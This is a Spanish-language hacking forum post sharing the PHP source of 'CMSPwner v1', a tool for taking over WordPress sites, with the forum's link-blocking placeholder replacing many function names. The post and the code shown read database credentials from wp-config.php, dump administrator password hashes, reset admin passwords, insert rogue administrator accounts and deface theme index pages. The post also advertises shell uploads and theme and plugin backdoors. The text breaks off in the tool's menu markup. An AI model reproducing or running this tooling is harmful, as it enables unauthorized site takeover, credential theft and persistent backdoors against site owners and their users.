comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CMSPwner v1 [Wordpress Version][Source]

  • 21 Respuestas
  • 12705 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« en: Agosto 02, 2012, 10:35:39 pm »


Cree este script para la comunidad de r00tw0rm llamado CMPwner orientado a facilitar la tarea de penetrar plataformas como Wordpress, Joomla, etc.
Como es la primer versión solo contiene el modulo de Wordpress (esperen por los siguientes)

Con este modulo pueden:
Obtener automáticamente la configuración de la DB.
Obtener la información más importante de Wordpress
Mirar todos los administradores
Resetear la contraseña de cualquiera de ellos
Agregar nuevo administrador
Cambiar el index principal (/) con fopen
Cambiar el index del tema actual con fopen
Cambiar el index del tema actual con cURL (credenciales de usuario requeridas)
Subir shell
Subir shell a cualquier tema
Subir shell a cualquier plugin
Poner un backdoor editando el contenido de cualquier tema
Poner un backdoor editando el contenido de cualquier plugin

Demostration:


Source:
Código: PHP
  1. <?php
  2. #########
  3. # Script Title: CMSPwner v1 Wordpress Version
  4. # Version: 1.0 Beta
  5. # Date: 02/08/12
  6. # Script Author: Xt3mP
  7. # Home: http://xt3mp.mx
  8. # For: http://r00tw0rm.com
  9. # Contact: xt3mp[at]null[dot]com
  10. #  _____ _____ _____ _____                  
  11. # |     |     |   __|  _  |_ _ _ ___ ___ ___
  12. # |   --| | | |__   |   __| | | |   | -_|  _|
  13. # |_____|_|_|_|_____|__|  |_____|_|_|___|_|  
  14. #
  15. #########
  16. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  17. $authUser = 'Xt3mP';
  18. $authPass = '63a9f0ea7bb98050796b649e85481845';
  19. function checkTable($dbName, $dbPref)
  20. {
  21.         $query = No tienes permisos para ver links. Registrate o Entra con tu cuenta('SHOW TABLES FROM '.$dbName) or No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta());
  22.         $allowedTables = No tienes permisos para ver links. Registrate o Entra con tu cuenta($dbPref.'options', $dbPref.'users', $dbPref.'usersmeta');
  23.         $counter = 0;
  24.         while($table = No tienes permisos para ver links. Registrate o Entra con tu cuenta($query))
  25.         {
  26.                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($table[0], $allowedTables))
  27.                         $counter++;
  28.         }
  29.         if($counter != 2)
  30.                 return false;
  31.         else
  32.                 return true;
  33. }
  34. function getInfo($pref, $optionName)
  35. {
  36.         $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT option_value FROM '.$pref.'options WHERE option_name="'.$optionName.'"'));
  37.         return $data->option_value;
  38. }
  39. function getVersion($url)
  40. {
  41.         $source = No tienes permisos para ver links. Registrate o Entra con tu cuenta($url);
  42.         $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta("/<meta name=\"generator\" content=\"WordPress (.*)\" \/>/", $source, $version);
  43.         return $version[1];
  44. }
  45. function getTotalAdmins($pref)
  46. {
  47.         $adms = @No tienes permisos para ver links. Registrate o Entra con tu cuenta(@No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT user_id FROM '.$pref.'usermeta WHERE meta_value=10'));
  48.         return $adms;
  49. }
  50. function getAdmins($pref, $type = 'name')
  51. {
  52.         $adm = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT user_id FROM '.$pref.'usermeta WHERE meta_value=10');
  53.         while($admId = @No tienes permisos para ver links. Registrate o Entra con tu cuenta($adm))
  54.         {
  55.                 if($type == 'name')
  56.                 {
  57.                         $admData = @No tienes permisos para ver links. Registrate o Entra con tu cuenta(@No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT user_login, user_nicename FROM '.$pref.'users WHERE ID='.$admId->user_id));
  58.                         $option .= '<option value="'.$admId->user_id.'">'.$admData->user_login.'['.$admData->user_nicename.']</option>';
  59.                 }
  60.                 else
  61.                 {
  62.                         $class = ($number == '0') ? 'dark-green' : 'light-green';
  63.                         $admData = @No tienes permisos para ver links. Registrate o Entra con tu cuenta(@No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT user_login, user_pass, user_email FROM '.$pref.'users WHERE ID='.$admId->user_id));
  64.                         $option .= '<tr class="'.$class.'"><td>'.$admData->user_login.'</td><td>'.$admData->user_pass.'</td><td>'.$admData->user_email.'</td></tr>';
  65.                         $number = ($number == '0') ? '1' : '0';
  66.                 }
  67.         }
  68.         if($type == 'name')
  69.                 return $option;
  70.         else
  71.                 return '<table width="100%" align="center"><tr class="header"><td>User</td><td>Pass</td><td>Mail</td></tr>'.$option.'</table>';
  72. }
  73. function updateAdmin($pref, $admUser, $admPass)
  74. {
  75.         $newPass = No tienes permisos para ver links. Registrate o Entra con tu cuenta($admPass);
  76.         $update = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('UPDATE '.$pref.'users SET user_pass="'.$newPass.'" WHERE ID='.$admUser);
  77.         if(!$update)
  78.                 return false;
  79.         else
  80.                 return true;
  81. }
  82. function getAdminById($pref, $admId)
  83. {
  84.         $admData = @No tienes permisos para ver links. Registrate o Entra con tu cuenta(@No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT user_login FROM '.$pref.'users WHERE ID='.$admId));
  85.         return $admData->user_login;
  86. }
  87. function checkUser($pref, $admUser)
  88. {
  89.         $adm = @No tienes permisos para ver links. Registrate o Entra con tu cuenta(@No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT user_login FROM '.$pref.'users WHERE user_login="'.$admUser.'"'));
  90.         if($adm > 0)
  91.                 return false;
  92.         else
  93.                 return true;
  94. }
  95. function addAdminUser($pref, $admUser, $admPass)
  96. {
  97.         $insert = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('INSERT INTO '.$pref.'users (user_login, user_pass, user_nicename, user_email) values ("'.$admUser.'", "'.No tienes permisos para ver links. Registrate o Entra con tu cuenta($admPass).'", "'.$admUser.'", "'.$admUser.'@'.$admUser.'.com")');
  98.         if(!$insert)
  99.         {
  100.                 return false;
  101.         }
  102.         else
  103.                 $id = @No tienes permisos para ver links. Registrate o Entra con tu cuenta(@No tienes permisos para ver links. Registrate o Entra con tu cuenta('SELECT ID FROM '.$pref.'users WHERE user_login="'.$admUser.'"'));
  104.                 $insert = No tienes permisos para ver links. Registrate o Entra con tu cuenta('INSERT INTO '.$pref.'usermeta (user_id, meta_key, meta_value) values ('.$id->ID.', "wp_capabilities", "a:1:{s:13:\"administrator\";s:1:\"1\";}")') or No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta());
  105.                 $insert = No tienes permisos para ver links. Registrate o Entra con tu cuenta('INSERT INTO '.$pref.'usermeta (user_id, meta_key, meta_value) values ('.$id->ID.', "wp_user_level", "10")') or No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta());
  106.                 return true;
  107. }
  108. function checkLogin($wpUrl, $wpUser, $wpPass)
  109. {
  110.         $fields = 'log='.$wpUser.'&pwd='.$wpPass.'&wp-submit=Acceder';
  111.         $ch = No tienes permisos para ver links. Registrate o Entra con tu cuenta();  
  112.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_USERAGENT, 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0a2) Gecko/20111014 Firefox/9.0a2');
  113.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_AUTOREFERER, false);
  114.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_REFERER, $wpUrl);
  115.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_RETURNTRANSFER, 1);
  116.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_SSL_VERIFYPEER, false);
  117.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_FOLLOWLOCATION, 1);
  118.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_HEADER, 1);
  119.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_URL, $wpUrl.'/wp-login.php');
  120.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_POST, true);  
  121.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_POSTFIELDS, $fields);
  122.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  123.         $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  124.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  125.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($data, '<strong>ERROR</strong>'))
  126.                 return false;
  127.         else
  128.                 return true;
  129. }
  130. function sourceIndex($wpUrl, $theme)
  131. {
  132.         $ch = No tienes permisos para ver links. Registrate o Entra con tu cuenta();  
  133.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_URL, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.$theme);
  134.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  135.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_USERAGENT, 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0a2) Gecko/20111014 Firefox/9.0a2');
  136.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_AUTOREFERER, false);
  137.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_REFERER, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.$theme);
  138.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_RETURNTRANSFER, 1);
  139.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_SSL_VERIFYPEER, false);
  140.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_FOLLOWLOCATION, 0);
  141.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_HEADER, 1);
  142.         $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  143.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  144.         return $data;
  145. }
  146. function changeIndex($wpUrl, $wpCont, $theme, $wpnonce)
  147. {
  148.         $ch = No tienes permisos para ver links. Registrate o Entra con tu cuenta();  
  149.         $fields = '_wpnonce='.$wpnonce.'&newcontent='.No tienes permisos para ver links. Registrate o Entra con tu cuenta($wpCont).'&action=update&file=index.php&theme='.$theme.'&scrollto=0&submit=Actualizar Archivo';
  150.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_URL, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.$theme);
  151.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  152.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_USERAGENT, 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0a2) Gecko/20111014 Firefox/9.0a2');
  153.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_AUTOREFERER, false);
  154.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_REFERER, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.$theme);
  155.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_RETURNTRANSFER, 1);
  156.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_SSL_VERIFYPEER, false);
  157.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_FOLLOWLOCATION, 0);
  158.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_HEADER, 1);
  159.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_POST, true);  
  160.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_POSTFIELDS, $fields);
  161.         $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  162.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  163.         return true;
  164. }
  165. function getThemes()
  166. {
  167.         $themes = No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/');
  168.         foreach($themes as $theme)
  169.         {
  170.                 if($theme != '.' && $theme != '..' && No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/'.$theme))
  171.                 {
  172.                         $realThemes .= '<option value="'.$theme.'">'.$theme.'</option>';
  173.                 }
  174.         }
  175.         return $realThemes;
  176. }
  177. function getPlugins()
  178. {
  179.         $plugins = No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/');
  180.         foreach($plugins as $plugin)
  181.         {
  182.                 if($plugin != '.' && $plugin != '..' && No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/'.$plugin))
  183.                 {
  184.                         $pluginData = No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/'.$plugin);
  185.                         $pluginPath = $plugin;
  186.                         if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/'.$plugin))
  187.                         {
  188.                                 $pluginPath = '/';
  189.                                 $plugin = $pluginData['filename'];
  190.                         }
  191.                         $realPlugins .= '<option value="'.$pluginPath.'">'.$plugin.'</option>';
  192.                 }
  193.         }
  194.         return $realPlugins.'<option value="/">/</option>';
  195. }
  196.  
  197. function getInstalledPlugins($wpUrl, $plugins, $home = false)
  198. {
  199.         $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta("/a:(.*):{/", $plugins, $a);
  200.         for($i = 0; $i < $a[1]; $i++)
  201.         {
  202.                 $c = $a[1] - 1;
  203.                 if($i != $c)
  204.                 {
  205.                         $next = $i + 1;
  206.                         $pat = "/i:$i;s:[0-9]*:\"(.*)\";i:$next/";
  207.                 }else{
  208.                         if($a[1] == 1)
  209.                                 $pat = "/{i:$i;s:[0-9]*:\"(.*)\";}/";
  210.                         else
  211.                                 $pat = "/;i:$i;s:[0-9]*:\"(.*)\";/";
  212.                 }
  213.                 $datas = No tienes permisos para ver links. Registrate o Entra con tu cuenta($pat, $plugins, $b);
  214.                 $pluginsc .= (!$home) ? '<a href="'.$wpUrl.'/wp-content/plugins/'.$b[1].'" target="_blank">'.$b[1].'</a><br />' : '<option value="'.$b[1].'">'.$b[1].'</option>';
  215.         }
  216.         return (!$home) ? No tienes permisos para ver links. Registrate o Entra con tu cuenta($pluginsc, 0, No tienes permisos para ver links. Registrate o Entra con tu cuenta($pluginsc) - 6) : $pluginsc;
  217. }
  218. ?>
  219. <!DOCTYPE html>
  220. <head>
  221. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  222. <title>CMSPwner v1 [WP Version]</title>
  223. <style type="text/css">html,body,div,span,applet,object,iframe,h1,h2,h3,h  4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,bi  g,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,  strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd  ,ol,ul,li,fieldset,form,label,legend,table,caption  ,tbody,tfoot,thead,tr,th,td,article,aside,canvas,d  etails,embed,figure,figcaption,footer,header,hgrou  p,menu,nav,output,ruby,section,summary,time,mark,a  udio,video{border:0;font:inherit;font-size:100%;margin:0;padding:0;vertical-align:baseline}article,aside,details,figcaption,fi  gure,footer,header,hgroup,menu,nav,section{display  :block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:bef  ore,blockquote:after,q:before,q:after{content:none  }table{border-collapse:collapse;border-spacing:0}</style>
  224. <style type="text/css">body{background-color:#2b2b2b;color:#828282;font-family:"Courier New", Courier, monospace;font-size:13px;font-weight:700;line-height:1em}div#container{width:600px}div#container fieldset{background-color:#FBFBFB;border:1px dashed #000;padding:5px;text-align:justify}hr{background-color:#000;color:#000}div#container legend{background-color:#FFF;border:1px dashed #000;color:#000;padding:5px}fieldset#login .a{width:200px}div#container input,div#container select,div#container textarea{-moz-border-radius:3px;-webkit-border-radius:3px;background-color:#333;border:1px dashed #000;border-radius:3px;color:#FFF;font-family:"Courier New", Courier, monospace;font-weight:700;padding:5px;text-align:center;width:148px}div#container textarea{resize:none;width:83%}div#container input:hover,div#container input:focus{font-style:normal}div#container input[type=submit]:hover{background-color:#888;cursor:pointer;text-shadow:1px 1px 1px #999}div#container .error,div#container .success{background-color:#ff4040;border:1px dashed red;color:#FFF;float:left;margin-bottom:5px;padding:5px;width:100%!important}div#co  ntainer .success{background-color:#49A349;border:1px dashed #002E00}div#container .menu{border-bottom:1px dashed #000;float:left;font-size:14px;margin-bottom:5px;padding-bottom:5px;text-align:center;width:100%}.data{float:left;width:98%  }.menu ul li{float:left;height:10px;width:100px}.menu ul li ul{background-color:#FBFBFB;border:1px dashed #000;border-top:none;display:none;float:left;height:auto;margi  n-top:2px;position:relative;width:130px}.menu ul li:hover ul{display:block}.menu ul li ul li{background:#CCC;float:left;height:10px;padding:  5px 0 5px 2px;text-align:left;width:130px}.menu ul li.nonse{float:left;width:20px}div#sql_data,div#da  ta{border-top:1px dashed #000;margin-top:5px;padding-top:5px}div#sql_data label,div#data label{float:left;margin-right:5px;padding:8px 0;text-align:right;width:60px}div#container .clear{float:left;width:100%}div#sql_data input[type=text],div#data input[type=text],div#data select,div#data textarea{margin-right:5px}select{text-align:center}div#container a{color:#111;text-decoration:none}div#container a:hover{color:#191919;text-decoration:underline}div#data{border:none}div#info  {border-bottom:1px dashed #000;padding-bottom:5px}table,td,tr{padding:5px;text-align:center}.header{background-color:#000;color:#FFF}.light-green,.dark-green{background-color:#FCFCFC;color:#000}div#container input[type=submit],.dark-green{background-color:#666}div#sql_data input[type=submit],div#data input[type=submit],div#data select{width:160px}div#container .get_config{border-top:1px dashed #000;margin-top:5px;padding-top:5px;text-align:center}div#container .success a,div#container .success a:hover,.dark-green{color:#FFF}</style>
  225. <script src="http://code.jquery.com/jquery-1.7.2.min.js"></script>
  226. <script>$(function(){windowsHeight=$(window).height();wind  owsWidth=$(window).width();div=$('#container');div  Height=div.height();divWidth=div.width();up=window  sHeight/2.3-(divHeight/2);left=windowsWidth/2-(divWidth/2);$("#container").css("margin-top",up);$("#container").css("margin-left",left);function putValue(fieldId,newValue,defaultValue){if($("#"+fieldId).val()==defaultValue){$("#"+fieldId).val(newValue)}}$("#user").focusin(function(){putValue("user","","User")});$("#user").focusout(function(){putValue("user","User","")});$("#pass").focusin(function(){putValue("pass","","********")});$("#pass").focusout(function(){putValue("pass","********","")});$("#db_srvr").focusin(function(){putValue("db_srvr","","localhost")});$("#db_srvr").focusout(function(){putValue("db_srvr","localhost","")});$("#db_user").focusin(function(){putValue("db_user","","root")});$("#db_user").focusout(function(){putValue("db_user","root","")});$("#db_pass").focusin(function(){putValue("db_pass","","root")});$("#db_pass").focusout(function(){putValue("db_pass","root","")});$("#db_name").focusin(function(){putValue("db_name","","wp_db")});$("#db_name").focusout(function(){putValue("db_name","wp_db","")});$("#db_pref").focusin(function(){putValue("db_pref","","wp_")});$("#db_pref").focusout(function(){putValue("db_pref","wp_","")});$("#new_pass").focusin(function(){putValue("new_pass","","new_pass")});$("#new_pass").focusout(function(){putValue("new_pass","new_pass","")});$("#new_user").focusin(function(){putValue("new_user","","Admin2")});$("#new_user").focusout(function(){putValue("new_user","Admin2","")});$("#wp_url").focusin(function(){putValue("wp_url","","http://site.com/wp")});$("#wp_url").focusout(function(){putValue("wp_url","http://site.com/wp","")});$("#shell_name").focusin(function(){putValue("shell_name","","shell.php")});$("#shell_name").focusout(function(){putValue("shell_name","shell.php","")})});</script>
  227. </head>
  228. <body>
  229. <div id="container">
  230.         <div class="logo">
  231.                 <pre>
  232.        _____ __  __  _____ _____                                  __
  233.     X / ____|  \/  |/ ____|  __ \                                /_ |X
  234.     t| |    | \  / | (___ | |__) |_      ___ __   ___ _ __  __   _| |t
  235.     3| |    | |\/| |\___ \|  ___/\ \ /\ / / '_ \ / _ \ '__| \ \ / / |3
  236.     m| |____| |  | |____) | |     \ V  V /| | | |  __/ |     \ V /| |m
  237.     P \_____|_|  |_|_____/|_|      \_/\_/ |_| |_|\___|_| t00l \_/ |_|P                                                                  
  238.                 </pre>
  239.         </div>
  240.         <form action="" method="POST" enctype="multipart/form-data">
  241.                 <?php
  242.                 if(!$_SESSION['logged']):
  243.                 ?>
  244.                         <fieldset id="login">
  245.                                 <legend>CMSPwner v1 - Login</legend>
  246.                                 <?php
  247.                                 $showLogin = true;
  248.                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['login'])):
  249.                                         $user = $_POST['user'];
  250.                                         $pass = $_POST['pass'];
  251.                                         if($user != $authUser or No tienes permisos para ver links. Registrate o Entra con tu cuenta($pass) != $authPass):
  252.                                                 echo '<div class="error">Bad username or password</div>';
  253.                                         else:
  254.                                                 $showLogin = false;
  255.                                                 $_SESSION['logged'] = true;
  256.                                                 $_SESSION['user'] = $user;
  257.                                                 echo '<div class="success">Welcome '.$user.'</div>';
  258.                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  259.                                         endif;
  260.                                 endif;
  261.                                 if($showLogin):
  262.                                 ?>
  263.                                         <input type="text" id="user" name="user" value="User" class="a"/>
  264.                                         <input type="password" id="pass" name="pass" value="********" class="a"/>
  265.                                         <input type="submit" name="login" value="Access" />
  266.                                 <?php
  267.                                 endif;
  268.                                 ?>
  269.                         </fieldset>
  270.                 <?php
  271.                 else:
  272.                 ?>
  273.                         <fieldset>
  274.                                 <?php
  275.                                 if(!$_SESSION['sqlCredentials']):
  276.                                 ?>
  277.                                         <legend>CMSPwner v1 - SQL Credentials</legend>
  278.                                         This system requires SQL credentials to work correctly. Please make sure that your credentials are correct.<br />
  279.                                         <?php
  280.                                         $showForm = true;
  281.                                         if($_GET['s3ct10n'] == 'getconfig'):
  282.                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['get_config'])):
  283.                                                         $configContent = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-config.php');
  284.                                                         if(!$configContent):
  285.                                                                 echo '<div class="error">Can\'t open/found wp-config.php file</div>';
  286.                                                         else:
  287.                                                                 $data = @No tienes permisos para ver links. Registrate o Entra con tu cuenta("/define\('DB_HOST', '(.*)'\);/", $configContent, $host);
  288.                                                                 $data = @No tienes permisos para ver links. Registrate o Entra con tu cuenta("/define\('DB_USER', '(.*)'\);/", $configContent, $user);
  289.                                                                 $data = @No tienes permisos para ver links. Registrate o Entra con tu cuenta("/define\('DB_PASSWORD', '(.*)'\);/", $configContent, $pass);
  290.                                                                 $data = @No tienes permisos para ver links. Registrate o Entra con tu cuenta("/define\('DB_NAME', '(.*)'\);/", $configContent, $name);
  291.                                                                 $data = @No tienes permisos para ver links. Registrate o Entra con tu cuenta("/table_prefix  = '(.*)';/", $configContent, $pref);
  292.                                                                 $_SESSION['dbSrvr'] = $host[1];
  293.                                                                 $_SESSION['dbUser'] = $user[1];
  294.                                                                 $_SESSION['dbPass'] = $pass[1];
  295.                                                                 $_SESSION['dbName'] = $name[1];
  296.                                                                 $_SESSION['dbPref'] = $pref[1];
  297.                                                                 $showForm = false;
  298.                                                                 echo '<div class="success">Configuration obtained correctly</div>';
  299.                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  300.                                                         endif;
  301.                                                 endif;
  302.                                                 if($showForm):
  303.                                                         $file = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SERVER['PHP_SELF']);
  304.                                         ?>
  305.                                                         <div class="get_config" style="text-align:left;">You need put this file in same WP path:</div>
  306.                                                         <div id="sql_data">
  307.                                                                 <div class="clear"><label>File:</label><input type="text" value="<?php echo $file; ?>" disabled="disabled" />< Script<br /></div>
  308.                                                                 <div class="clear"><label></label><input type="submit" name="get_config" value="Get Config" /></div>
  309.                                                         </div>
  310.                                         <?php
  311.                                                 endif;
  312.                                         else:
  313.                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['sql'])):
  314.                                                         $dbSrvr = $_POST['db_srvr'];
  315.                                                         $dbUser = $_POST['db_user'];
  316.                                                         $dbPass = $_POST['db_pass'];
  317.                                                         $dbName = $_POST['db_name'];
  318.                                                         $dbPref = $_POST['db_pref'];
  319.                                                         $dbCon = @No tienes permisos para ver links. Registrate o Entra con tu cuenta($dbSrvr, $dbUser, $dbPass);
  320.                                                         $dbSel = @No tienes permisos para ver links. Registrate o Entra con tu cuenta($dbName, $dbCon);
  321.                                                         if(!$dbCon):
  322.                                                                 echo '<div class="error">Can\'t connect to the server: '.$dbUser.'@'.$dbSrvr.'</div>';
  323.                                                         elseif(!$dbSel):
  324.                                                                 echo '<div class="error">Can\'t select DB: '.$dbName.'</div>';
  325.                                                         elseif(!checkTable($dbName, $dbPref)):
  326.                                                                 echo '<div class="error">Can\'t detect WP tables with Preffix: '.$dbPref.'</div>';
  327.                                                         else:
  328.                                                                 $_SESSION['dbSrvr'] = $dbSrvr;
  329.                                                                 $_SESSION['dbUser'] = $dbUser;
  330.                                                                 $_SESSION['dbPass'] = $dbPass;
  331.                                                                 $_SESSION['dbName'] = $dbName;
  332.                                                                 $_SESSION['dbPref'] = $dbPref;
  333.                                                                 $_SESSION['sqlCredentials'] = true;
  334.                                                                 $showForm = false;
  335.                                                                 echo '<div class="success">SQL Credentials accepted correctly</div>';
  336.                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  337.                                                         endif;
  338.                                                 endif;
  339.                                                 if($showForm):
  340.                                                         $srvr = (No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbSrvr'])) ? 'localhost' : $_SESSION['dbSrvr'];
  341.                                                         $user = (No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbUser'])) ? 'root' : $_SESSION['dbUser'];
  342.                                                         $pass = (No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbPass'])) ? 'root' : $_SESSION['dbPass'];
  343.                                                         $name = (No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbName'])) ? 'wp_db' : $_SESSION['dbName'];
  344.                                                         $pref = (No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbPref'])) ? 'wp_': $_SESSION['dbPref'];
  345.                                         ?>
  346.                                                         <div class="get_config">[<a href="?s3ct10n=getconfig">Try to get config automatically</a>]</div>
  347.                                                         <div id="sql_data">
  348.                                                                 <div class="clear"><label>Server:</label><input type="text" id="db_srvr" name="db_srvr" value="<?php echo $srvr; ?>" />< Insert SQL Server<br /></div>
  349.                                                                 <div class="clear"><label>User:</label><input type="text" id="db_user" name="db_user" value="<?php echo $user; ?>" />< Insert SQL Username<br /></div>
  350.                                                                 <div class="clear"><label>Pass:</label><input type="text" id="db_pass" name="db_pass" value="<?php echo $pass; ?>" />< Insert SQL Password<br /></div>
  351.                                                                 <div class="clear"><label>Name:</label><input type="text" id="db_name" name="db_name" value="<?php echo $name; ?>" />< Insert SQL Database Name<br /></div>
  352.                                                                 <div class="clear"><label>Prefix:</label><input type="text" id="db_pref" name="db_pref" value="<?php echo $pref; ?>" />< Insert Wordpress DB Preffix<br /></div>
  353.                                                                 <div class="clear"><label></label><input type="submit" name="sql" value="Check SQL Data" />
  354.                                                         </div>
  355.                                         <?php
  356.                                                 endif;
  357.                                         endif;
  358.                                         ?>
  359.                                 <?php
  360.                                 else:
  361.                                         $dbCon = @No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbSrvr'], $_SESSION['dbUser'], $_SESSION['dbPass']);
  362.                                         @No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SESSION['dbName'], $dbCon);
  363.                                 ?>
  364.                                         <legend>CMSPwner v1 - System</legend>
  365.                                         <div class="menu">
  366.                                                 <ul>
  367.                                                         <li>Menu
  368.                                                                 <ul>
  369.                                                                         <li><a href="?">Home</a></li>
  370.                                                                         <li><a href="?s3ct10n=logout">Logout</a></li>
  371.                                                                         <li><a href="?s3ct10n=selfremove">Self Remove</a></li>
  372.                                                                         <li><a href="?s3ct10n=about">About</a></li>
  373.                                                                 </ul>
  374.                                                         </li>
  375.                                                         <li>Admin
  376.                                                                 <ul>
  377.                                                                         <li><a href="?s3ct10n=1">Adm List</a></li>
  378.                                                                         <li><a href="?s3ct10n=2">Reset Adm Pass</a></li>
  379.                                                                         <li><a href="?s3ct10n=3">Add New Adm</a></li>
  380.                                                                 </ul>
  381.                                                         </li>
  382.                                                         <li>Change Index
  383.                                                                 <ul>
  384.                                                                         <li><a href="?s3ct10n=4">Main [fopen]</a></li>
  385.                                                                         <li><a href="?s3ct10n=5">Theme [cURL]</a></li>
  386.                                                                         <li><a href="?s3ct10n=6">Theme [fopen]</a></li>
  387.                                                                 </ul>
  388.                                                         </li>
  389.                                                         <li>Shell
  390.                                                                 <ul>
  391.                                                                         <li><a href="?s3ct10n=7">Upload</a></li>
  392.                                                                         <li><a href="?s3ct10n=8">Make [themes]</a></li>
  393.                                                                         <li><a href="?s3ct10n=9">Make [plugins]</a></li>
  394.                                                                 </ul>
  395.                                                         </li>
